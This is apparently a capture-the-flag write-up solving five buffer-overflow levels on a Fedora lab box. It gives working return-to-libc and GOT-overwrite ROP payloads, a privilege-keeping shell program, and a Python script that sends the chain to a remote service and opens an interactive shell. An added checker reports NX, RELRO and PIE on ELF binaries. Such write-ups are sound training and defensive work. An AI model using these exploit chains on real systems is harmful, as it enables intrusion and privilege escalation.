Solutions
Level 1
- An upgraded simple buffer overflow. Because of the operating system's memory protections (randomized stack, ASLR, ASCII armor, etc.) we use RTL (return-to-libc) or ROP rather than shellcode. The hint is fake ebp, and I'll use fake ebp + RTL.
- Use execve instead of system: the internal routine of system re-sets the geteuid value, so the shell would lose its privilege.
- Since shellcode can no longer be used, we need a program that elevates privilege and runs /bin/sh, and we hand that program to execve through argv.
- Careful: the stack is randomized, so any value we place on the stack changes every run, and so does execve's argv inside the payload. By returning to a ret instruction we can slide eip further along the stack (a ret sled).
- Code (the get-shell program):
  #include <unistd.h>
  #include <stdlib.h>
  int main(int argc, char *argv[]) {
      setreuid(geteuid(), geteuid());
      system("/bin/sh");
      return 0;
  }
- execve address : 0x007a5490, and +1 : 0x007a5491
- ret address : 0x08048441
- file name : 3c ed 83 (the bytes found at execve's argv[0]; I link my get-shell program to a file of this name, so that is what runs when execve is called)
- payload (./aaaa is the compiled get-shell program):
  ln -s ./aaaa "$(echo -en "\x3c\xed\x83")"
  ./iron_golem $(python -c 'print "A"*268 + "\x41\x84\x04\x08"*2 + "\x91\x54\x7a\x00"')
Level 2
- Same as level 1, except that we can't deal with the sfp. The payload is still the same as in level 1, because we never needed the sfp area above the payload.
- ret address : 0x080484b9
- payload : ./dark_eyes $(python -c 'print "A"*268 + "\xb9\x84\x04\x08"*2 + "\x91\x54\x7a\x00"')
Level 3
- Remote exploit, otherwise similar to level 2. As we know, we can't use fake ebp, at least not on the stack.
- Tip: the do_system function works as execve("/bin/sh", ..., 0), so just running this function gives us a shell (I found this on the internet).
- do_system address : 0x0075077f
- payload : (python -c 'print "A"*268 + "\x7f\x07\x75\x00"'; cat) | nc localhost 7777
Level 4
- A GOT overwriting problem. To make it easier, this binary gives us a ppr (pop; pop; ret) gadget.
- Payload form: A*268, then one strcpy call per byte of system's address, each written as strcpy@plt, ppr, printf@got+k, [address of a byte equal to the k-th byte of system] for k = 0, 1, 2, 3, and finally printf@plt + A*4 + "/bin/sh" (printf@got now holds system's address, so the printf@plt call runs system with "/bin/sh" as its argument).
- ppr address : 0x0804854c
- system address : 0x00 75 07 c0 (we must find each of these byte values in a fixed area, such as the got; I got the gadget address from another blog hahaha)
- strcpy@plt address : 0x08048494
- printf@got address : 0x08049884
- printf@plt address : 0x08048424
- /bin/sh address : 0x00833603
- payload :
  ./evil_wizard "$(python -c 'print "A"*268 + "\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x84\x98\x04\x08" + "\x20\x84\x04\x08" + "\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x85\x98\x04\x08" + "\x2c\x80\x04\x08" + "\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x86\x98\x04\x08" + "\xc8\x82\x04\x08" + "\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x87\x98\x04\x08" + "\x2d\x80\x04\x08" + "\x24\x84\x04\x08" + "A"*4 + "\x03\x36\x83\x00"')"
Level 5
- Level 4 + buffer cleaning + remote exploit. The payload is similar to the previous level's, and we use a custom stack to store "/bin/sh\0" one character at a time.
- ppr address : 0x080484f3
- gadgets for the bytes of system's address : (taken from another blog, haha)
- memcpy@got address : 0x08049850
- memcpy@plt address : 0x08048418
- custom stack address : 0x08049878
- strcpy@plt address : 0x08048438
- Python Code :
from socket import *
import struct

p = lambda x: struct.pack('<I', x)   # pack a 32-bit little-endian address

ppr = 0x80484f3            # pop; pop; ret gadget
strcpy_plt = 0x8048438
memcpy_plt = 0x8048418
memcpy_got = 0x8049850     # GOT entry that gets overwritten with system's address
cus_stack = 0x8049878      # writable area used as a custom stack for "/bin/sh\0"
# addresses of bytes equal to each byte of system's address, in memory order
sys_1 = 0x80484d0
sys_2 = 0x804817c
sys_3 = 0x80482b4
sys_4 = 0x8048138          # a 0x00 byte; reused below as the string terminator
# addresses of bytes holding the characters of "/bin/sh"
slash = 0x8048114
b = 0x8048117
i = 0x8048116
n = 0x804811e
ch_s = 0x8048746
h = 0x80481b8

payload = "A"*268
# copy system address to memcpy_got, one byte per strcpy call
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got)
payload += p(sys_1)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got+1)
payload += p(sys_2)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got+2)
payload += p(sys_3)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got+3)
payload += p(sys_4)
# copy /bin/sh\0 to custom stack, one character per strcpy call
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack)
payload += p(slash)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+1)
payload += p(b)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+2)
payload += p(i)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+3)
payload += p(n)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+4)
payload += p(slash)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+5)
payload += p(ch_s)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+6)
payload += p(h)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+7)
payload += p(sys_4)        # terminating NUL
# run it! memcpy@plt now goes to system; dummy return address, then the argument
payload += p(memcpy_plt)
payload += "A"*4
payload += p(cus_stack)

s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.254.130", 8888))
s.send(payload + '\n')
print s.recv(1024)
while True:
    cmd = raw_input('$ ')
    s.send(cmd + '\n')
    print s.recv(1024)
s.close()
ALL CLEAR!
[dark_stone@Fedora_1stFloor ~]$ ls
dropped_item.txt
[dark_stone@Fedora_1stFloor ~]$ cat ./*
(ASCII-art drawing of the dropped item, flattened in extraction)
[dark_stone@Fedora_1stFloor ~]$
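Every level above relies on a protection the target is missing: a non-executable stack forces the RTL and ROP chains, but libc sits at a fixed address and, in levels 4 and 5, the GOT is writable, so a byte-by-byte strcpy can redirect printf@got or memcpy@got to system. As an added example (not part of the original writeup), the small checker below reads the ELF program headers and dynamic section to report NX, RELRO (partial or full) and PIE for a binary, the way checksec does; full RELRO with BIND_NOW is what takes the GOT overwrite off the table, because .got.plt is remapped read-only once the loader has resolved every symbol. The function names `checksec` and `build_elf32` are mine, and `build_elf32` only constructs a header-only sample image so the check runs offline without a real binary.

```python
import struct

# ELF constants (values as in elf.h)
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474e551, 0x6474e552
PF_X, ET_DYN = 1, 3
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6ffffffb
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

def checksec(elf):
    """Report NX, RELRO and PIE for a raw ELF image (32- or 64-bit, either byte order)."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64, e = elf[4] == 2, "<" if elf[5] == 1 else ">"
    e_type, = struct.unpack_from(e + "H", elf, 16)
    phoff, = struct.unpack_from(e + ("Q" if is64 else "I"), elf, 32 if is64 else 28)
    phentsize, phnum = struct.unpack_from(e + "HH", elf, 54 if is64 else 42)
    nx, relro, dyn = False, False, None   # no PT_GNU_STACK at all means an executable stack
    for k in range(phnum):
        f = struct.unpack_from(e + ("IIQQQQ" if is64 else "IIIIIII"), elf, phoff + k * phentsize)
        p_type, p_flags, p_offset, p_filesz = (f[0], f[1], f[2], f[5]) if is64 else (f[0], f[6], f[1], f[4])
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)     # stack not executable: code injected there cannot run
        elif p_type == PT_GNU_RELRO:
            relro = True                  # loader mprotect()s this range read-only after relocation
        elif p_type == PT_DYNAMIC:
            dyn = (p_offset, p_filesz)
    bind_now = False
    if dyn:
        fmt, size = (e + "qQ", 16) if is64 else (e + "iI", 8)
        for off in range(dyn[0], dyn[0] + dyn[1], size):
            tag, val = struct.unpack_from(fmt, elf, off)
            if tag == DT_NULL:
                break
            if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                bind_now = True           # every symbol resolved at load, so .got.plt lies inside the RELRO range too
    return {"nx": nx, "relro": "full" if relro and bind_now else "partial" if relro else "none",
            "pie": e_type == ET_DYN}

def build_elf32(exec_stack, relro, bind_now, pie):
    """Constructed sample: a header-only ELF32 image (not loadable) carrying the requested protections."""
    phdrs = [(PT_GNU_STACK, 0, 0, 0, 0, 0, 7 if exec_stack else 6, 16)]   # p_flags RWX or RW
    if relro:
        phdrs.append((PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1))
    dyn_off = 52 + 32 * (len(phdrs) + 1)          # dynamic entries follow the ehdr and the phdrs
    dyn = struct.pack("<iI", DT_FLAGS, DF_BIND_NOW if bind_now else 0) + struct.pack("<iI", DT_NULL, 0)
    phdrs.append((PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), 6, 4))
    ehdr = b"\x7fELF\x01\x01\x01" + b"\0" * 9 + struct.pack(
        "<HHIIIIIHHHHHH", ET_DYN if pie else 2, 3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    return ehdr + b"".join(struct.pack("<IIIIIIII", *p) for p in phdrs) + dyn
```

To check a real file, pass `open(path, "rb").read()` to `checksec`; a binary like the ones in these levels reports an NX stack but `relro` of "none" or "partial", which is exactly the condition the level 4 and 5 chains need.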